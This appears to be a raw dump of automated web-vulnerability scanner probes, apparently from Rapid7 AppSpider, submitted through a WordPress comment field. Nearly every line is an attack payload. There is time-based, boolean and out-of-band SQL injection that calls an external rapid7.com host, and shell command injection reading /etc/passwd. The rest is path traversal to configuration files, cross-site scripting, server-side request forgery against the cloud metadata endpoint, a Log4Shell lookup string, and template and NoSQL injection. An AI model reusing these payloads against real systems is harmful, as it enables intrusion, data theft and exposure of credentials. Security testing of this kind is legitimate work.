comment and 1 in (select BENCHMARK(1692307,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(14825947,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(2222222,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(13358,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(988,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(70,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(4,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(13097,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(835,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(53,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(4,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’;+exec+master..xp_dirtree+”//19d977e07a64d280c33462ed865680cda65e0d51.oob.appspidered.rapid7.com/a”–
comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’35697e2274daa06bb475a0a3317c9e8e37728829.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–
comment’;+SELECT+LOAD_FILE(‘\\\\a4b00b4abcfed2518fc7293475b8f52bb07c303e.oob.appspidered.rapid7.com\\a’)#
comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\de61ae3951c2cbc56e8346d80ce29e5bfe6fc5b1.oob.appspidered.rapid7.com\\a’#
comment’;+copy+(SELECT+”)+to+program+’nslookup+fc35d685179d5fc1c6d6050ccf1900da8fdffbbd.oob.appspidered.rapid7.com’–
comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://48b74772a2105f10b127d46f1d0e375d915a5c04.oob.appspidered.rapid7.com/’)+END)–
comment’;+exec+master..xp_dirtree+”//3c56a5e9f5938ed31dfad157038ee6e9e0510c6f.oob.appspidered.rapid7.com/a”–
comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’0b945a39f2c1993d58e9d9c03697086f374bb538.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–
comment’;+SELECT+LOAD_FILE(‘\\\\8b47c9e5afda52413931200dac69c19b432abefa.oob.appspidered.rapid7.com\\a’)#
comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\fa1bf37910ee565d1e2244adaa61d7b5357c86a5.oob.appspidered.rapid7.com\\a’#
comment’;+copy+(SELECT+”)+to+program+’nslookup+dbdf8583bcdda78c37e357cc627aaf08cca993d3.oob.appspidered.rapid7.com’–
comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://97aeecee3d9f28958d0d48de0f860a41b3ed9387.oob.appspidered.rapid7.com/’)+END)–
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(25694,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(5582,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(242000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(131663,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment
comment
commentx7ih23as
x7iz6uvl'”x7iz6uvl
comment
comment
comment
comment
comment
‘comment
comment’
comment”
comment$0
comment;/etc/passwd
comment|/bin/cat /etc/passwd
comment|/bin/cat /etc/passwd|
comment;/etc/hosts
comment|/bin/cat /etc/hosts
comment|/bin/cat /etc/hosts|
comment;/usr/bin/id
comment|/bin/cat /usr/bin/id
comment|/bin/cat /usr/bin/id|
type c:\boot.ini
comment&dir
comment&ipconfig
echo foobar x7kclrwd
comment&& echo foobar x7kygdzu
comment| echo foobar x7lifkt8
comment| echo foobar x7l1salp|
comment< echo foobar x7mlrhgo
netstat -na
comment&&netstat -na
comment|netstat -na
comment|netstat -na|
comment;netstat ;
comment<netstat -na
ping -h
comment&&ping -h
comment|ping -h
comment|ping -h|
comment<ping -h
$LANG
comment&&$LANG
comment|$LANG
${applicationScope}
${requestScope}
${“asdflkj”.toString().replace(“d”,”x”)}
#{“asdflkj”.toString().replace(“d”,”x”)}
wp-comments-post.php
/etc/passwd
\WINDOWS\system32\drivers\etc\hosts
C:\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts.htm
/wp-comments-post.php
../../../../../../../../../../etc/hosts
< /etc/passwd
/.
\.
c:\.
http://appspidered.rapid7.com/
appspidered.rapid7.com/
wp-comments-post.php.
../wp-comments-post.php.
../../wp-comments-post.php.
c:\boot.ini.
c:\boot.ini
d:\boot.ini
../../../../../../boot.ini.
..\..\..\..\..\
comment%u0022
{‘comment
x7ae8zwi: x7ae8zwi
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
alert(358218)
“>alert(420115)
“>alert(547958)
‘>alert(589220)
‘>alert(663486)
comment%u0027
|
!comment
comment
comment’ OR 1=0 ##
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment and 1 in (select BENCHMARK(1692307,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment
comment
comment
{{ 62951705 + 74179523 }}
comment’ and 1 in (select BENCHMARK(14825947,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
commentx77pducu
x777hlvt'”x777hlvt
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
x7w6bdw9: x7w6bdw9
https://appspidered.rapid7.com/xss/script/4320becfba430588bf63220dc0b8fe4a0aec652f
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
alert(1625233)
alert(1735890)
alert(1834250)
alert(1912135)
“>alert(2084310)
“>alert(2194976)
“>alert(2293342)
“>alert(2453183)
‘>alert(2555660)
‘>alert(2670418)
‘>alert(2793356)
‘>alert(2904001)
“>
“>
“>
“>
‘>
‘>
‘>
‘>
{constructor.constructor(4987940)}
{constructor.constructor(5193639)}
{constructor.constructor(5353966)}
{constructor.constructor(5534925)}
=alert(5711749)
=alert(5826945)
=alert(5946190)
=alert(6065420)
‘alert(6184712)
‘alert(6308115)
‘alert(6427407)
‘alert(6542567)
abc
abc
abc
abc
abc
abc
abc
abc
comment”>
comment”>
comment”>
comment”>
abc
abc
abc
abc
@import’x77toplb’;
@import’x78jwnze’;
@import’x7844tke’;
@import’x79wlpwn’;
ADw-script AD4-alert(10516716) ADw-/script AD4-
ADw-script AD4-alert(10664868) ADw-/script AD4-
+ADw-script+AD4-alert(10804718)+ADw-/script+AD4-
+ADw-script+AD4-alert(10952837)+ADw-/script+AD4-
abc
abc
abc
abc
comment’>
comment’>
comment’>
comment’>
http://appspidered.rapid7.com/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
commentʼ
comment| echo foobar x7l4qir9|
comment
comment’ OR ‘1’=’0
comment’) OR ‘1’ in (‘0
comment
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment
comment’ and 1 in (select*from(select(sleep(00)))a) —
comment’ and 1 in (select BENCHMARK(2222222,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
‘ (select*from(select(sleep(05)))a) ‘
%u2019comment
%u2018comment
/../../../../../../../../../../..
..\..\..\..\..\
../wp-config.php
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
commentx7czjhkb
x7dgeaw7′”x7dgeaw7
comment
comment
comment
comment
comment
commentcommentcomment
655321
./*][
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
x7haa7al
x7hrshqt
x7h9v896: x7h9v896
http://appspidered.rapid7.com/xss/script/f497b6e4aa3f44ccd29c8ff68ba523cc76a42afd
http://appspidered.rapid7.com/xss/script/7f7b1f7a525de379e7f6012f3620f0c5d98c8c18
http://appspidered.rapid7.com/xss/script/43a357e1d8eb83872d0a16c2f33596d9f510e85e
http://appspidered.rapid7.com/xss/script/d95d5c0a51cd5c9a4e50295f0e4df4b5a7a2590d
https://appspidered.rapid7.com/xss/script/7f2592c2c4e0e6d499f994a2e6cf09e0da209aaf
https://appspidered.rapid7.com/xss/script/d174310e15ae24f9d662691f918a0fa8fe68aaef
https://appspidered.rapid7.com/xss/script/929d06305ef82cd41d517acf5582a1e3365ef1dd
https://appspidered.rapid7.com/xss/script/865b177178f871ed5a902081103bf90aad62d295
http://appspidered.rapid7.com/xss/script/cfd452267954cc926c38248aafa1c3e9095e752f
http://appspidered.rapid7.com/xss/script/7d28005a67bcca00f70f969fcd8a30edf6433024
http://appspidered.rapid7.com/xss/script/a4bb793f0893dea04dfcf75edec91ff49cb4c409
https://appspidered.rapid7.com/xss/script/e60766aef66e522b8c741b23b1cd016eb460acfa
https://appspidered.rapid7.com/xss/script/58b7cd1ff0f2141e26db2b16ca61d342359cd711
https://appspidered.rapid7.com/xss/script/cb143f7bd7e6e8c772dcc85c1b6a6b5d3ac1e3a8
https://appspidered.rapid7.com/xss/script/92b3bb1257861093690490eb470c296af2a31b2f
appspidered.rapid7.com/xss/script/a937371235fe9f14fc8656abfd22c1fe99bb82bd
appspidered.rapid7.com/xss/script/3cf96efadc0c9e3e9139c7e05bd8e3eb0cb42033
appspidered.rapid7.com/xss/script/f1f737bfd734ed3b3ac720363111a413bb3523cf
appspidered.rapid7.com/xss/script/d7998d4d552fa466aab0bb08b9423d9b864b00d2
{{ 58719 * 21973 }}
{{ 62951705 + 74179523 }}
*
|
comment|
&
comment&
comment)
!comment
${jndi:ldap://b6674decbdab5eb5b9c05cb552b1fc9006192936.oob.appspidered.rapid7.${lower:COM}}
http://www.example.com/
https://example.com/
ftp://example.com/
http://example.com/
gopher://example.com/
example.com/
.example.com/
https://example.com/comment
wp-comments-post.php
/etc/passwd
\WINDOWS\system32\drivers\etc\hosts
C:\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts.htm
/wp-comments-post.php
../../../../../../../../../../etc/hosts
< /etc/passwd
/.
\.
c:\.
http://appspidered.rapid7.com/
appspidered.rapid7.com/
wp-comments-post.php.
../wp-comments-post.php.
../../wp-comments-post.php.
c:\boot.ini.
c:\boot.ini
../../../../../../boot.ini.
../../../../../../../../../../etc/hosts.
/..
\..
c:\..
/../../../../../../../../../../..
file:/etc/passwd
file:/wp-comments-post.php
/WEB-INF/web.xml
WEB-INF/web.xml
file:WEB-INF/web.xml
/../../WEB-INF/web.xml
\WEB-INF\web.xml
/../../../../../../../../../../.
noexistnoexist
http://localhost/
http://localhost:22/
package.json.bak
package.json.bak%00
../wp-config.php
http://appspidered.rapid7.com/rfi/x7nypayg
/../../../../../../../../../../vendor.js
../../../../../
..\..\..\..\..\
‘comment
comment’
comment”
comment%’
comment%u0027
comment%27
comment%”
comment%u0022
comment%22
LIMIT a
1e309
char(0x27)char(0x27)comment
%u2018comment
%u2019comment
%u201acomment
%u201bcomment
%u201ccomment
%u201dcomment
%u201ecomment
— comment
/*comment
commentʼ
comment’ UNION ALL select NULL —
comment” UNION ALL select NULL —
SELECT * FROM “master”
SELECC * FROM “ds”
comment’ AND ‘1’=’0
comment’ AND ‘1’=’1
comment” AND “1”=”0
comment” AND “1”=”1
comment’ AND 1=0/*
comment’ AND 1=1/*
comment’ AND 1=0)/*
comment’ AND 1=1)/*
comment’ AND 1=0–
comment’ AND 1=1–
comment’ AND 1=0)–
comment’ AND 1=1)–
comment’) AND (‘1’=’0
comment’) AND (‘1’=’1
comment”) AND (“1″”=”0
comment”) AND (“1″”=”1
comment’ AND 1=0 LIMIT 1–
comment’ AND 1=1 LIMIT 1–
REPEAT(0x636f6d6d656e74,2)
REPEAT(0x636f6d6d656e74,1)
comment OR 1=1
comment OR 1=0
comment’ OR ‘1’=’1
comment’ OR ‘1’=’0
comment” OR “1”=”1
comment” OR “1”=”0
comment’) OR (‘1’=’1
comment’) OR (‘1’=’0
comment”) OR (“1″=”1
comment”) OR (“1″=”0
comment’ OR 1=1 ##
comment’ OR 1=0 ##
comment’ OR 1=1 —
comment’ OR 1=0 —
comment’) AND ‘1’ in (‘0
comment’) AND ‘1’ in (‘1
comment”) AND “1” in (“0
comment”) AND “1” in (“1
comment’) OR ‘1’ in (‘0
comment’) OR ‘1’ in (‘1
comment”) OR “1” in (“0
comment”) OR “1” in (“1
comment DESC
comment ASC
1, comment DESC
1, comment ASC
comment
comment
comment
comment
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(13358,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(988,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(70,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(4,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(13097,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(835,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(53,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(4,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select*from(select(sleep(00)))a) —
comment’ and 1 in (select*from(select(sleep(05)))a) —
‘ (select*from(select(sleep(00)))a) ‘
‘ (select*from(select(sleep(05)))a) ‘
comment’);WAITFOR DELAY ’00:00:00′–
comment’);WAITFOR DELAY ’00:00:05′–
comment AND pg_sleep(00) is not null
comment AND pg_sleep(05) is not null
comment ‘;select pg_sleep(00);– –
comment ‘;select pg_sleep(05);– –
comment ;select pg_sleep(00);– –
comment ;select pg_sleep(05);– –
comment’;+exec+master..xp_dirtree+”//19d977e07a64d280c33462ed865680cda65e0d51.oob.appspidered.rapid7.com/a”–
comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’35697e2274daa06bb475a0a3317c9e8e37728829.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–
comment’;+SELECT+LOAD_FILE(‘\\\\a4b00b4abcfed2518fc7293475b8f52bb07c303e.oob.appspidered.rapid7.com\\a’)#
comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\de61ae3951c2cbc56e8346d80ce29e5bfe6fc5b1.oob.appspidered.rapid7.com\\a’#
comment’;+copy+(SELECT+”)+to+program+’nslookup+fc35d685179d5fc1c6d6050ccf1900da8fdffbbd.oob.appspidered.rapid7.com’–
comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://48b74772a2105f10b127d46f1d0e375d915a5c04.oob.appspidered.rapid7.com/’)+END)–
comment” && sleep(00) && “1”!=”1
comment” && sleep(10000) && “1”!=”1
comment” && “1”==”0
comment” && “1”==”1
comment’ && ‘1’==’0
comment’ && ‘1’==’1
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/network/interfaces/macs/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/metadata/instance/compute?api-version=2019-08-15
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0?api-version=2019-08-15
http://169.254.169.254/metadata/instance/network/interface/0?api-version=2019-08-15
< /etc/passwd
a
b
{comment
{‘comment
{“comment
comment{
comment’}
comment”}
comment}
comment/
comment/’
comment/”
/’comment
comment”}, {x7zij6lq:{$meta: “textScore
comment’}, {x7zz1g2u:{$meta: ‘textScore
comment”}}, {x70gwahm:{$meta: “textScore
comment’}, {x7014fh3:{$meta: ‘textScore
‘.phpinfo().’
${applicationScope}
${requestScope}
${“asdflkj”.toString().replace(“d”,”x”)}
#{“asdflkj”.toString().replace(“d”,”x”)}
comment$0
comment;/etc/passwd
comment|/bin/cat /etc/passwd
comment|/bin/cat /etc/passwd|
comment;/etc/hosts
comment|/bin/cat /etc/hosts
comment|/bin/cat /etc/hosts|
comment;/usr/bin/id
comment|/bin/cat /usr/bin/id
comment|/bin/cat /usr/bin/id|
type c:\boot.ini
comment&dir
comment&ipconfig
echo foobar x7cc5xan
comment&& echo foobar x7cwim0t
comment| echo foobar x7dmqkrn
comment| echo foobar x7d7ypq8|
comment< echo foobar x7eskdng
netstat -na
comment&&netstat -na
comment|netstat -na
comment|netstat -na|
comment;netstat ;
comment<netstat -na
ping -h
comment&&ping -h
comment|ping -h
comment|ping -h|
comment<ping -h
$LANG
comment&&$LANG
comment|$LANG
comment|$LANG|
comment<$LANG
; free
;ping localhost -c 21;
;TIMEOUT /T 10 /NOBREAK;
alert(6088805)
alert(6215838)
alert(6351084)
alert(6490430)
“>alert(6826533)
“>alert(6974060)
“>alert(7113397)
“>alert(7244564)
‘>alert(7412638)
‘>alert(7556077)
‘>alert(7687256)
‘>alert(7826616)
“>
“>
“>
‘>
‘>
‘>
{constructor.constructor(9052026)}
{constructor.constructor(9195448)}
{constructor.constructor(9355276)}
{constructor.constructor(9502806)}
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
